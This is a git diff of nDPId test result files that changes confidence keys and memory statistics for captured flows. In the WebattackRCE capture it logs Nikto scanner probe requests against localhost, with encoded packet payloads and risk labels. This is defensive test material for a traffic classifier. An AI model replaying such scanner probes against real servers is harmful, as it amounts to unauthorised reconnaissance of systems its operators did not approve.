00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865396190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1436865396190,"pkt":"RIpb2HMEACaIdf8bCABFAABMrX9AADcRaFpVFj54Ti5MCwB7AHsAOKmfIwIH6wAABFAAAAOrg7wD39lPUcMxZbhg2URXVTAzb9DZRFdVMbTpeNlPUfQtJuL0"} -00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":48,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1436865396190} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 673 chars diff --git a/test/results/Oscar.pcap.out b/test/results/Oscar.pcap.out index dbda01d60..8244d0241 100644 --- a/test/results/Oscar.pcap.out +++ b/test/results/Oscar.pcap.out @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5904384 bytes -~~ total memory freed........: 5904384 bytes -~~ total allocations/frees...: 118196/118196 +~~ total memory allocated....: 6007184 bytes +~~ total memory freed........: 6007184 bytes +~~ total allocations/frees...: 120948/120948 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 683 chars diff --git a/test/results/WebattackRCE.pcap.out b/test/results/WebattackRCE.pcap.out index 76a0dd0f7..fccd1646e 100644 --- a/test/results/WebattackRCE.pcap.out +++ b/test/results/WebattackRCE.pcap.out @@ -2,2395 +2,2395 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1576420276577} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} +01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 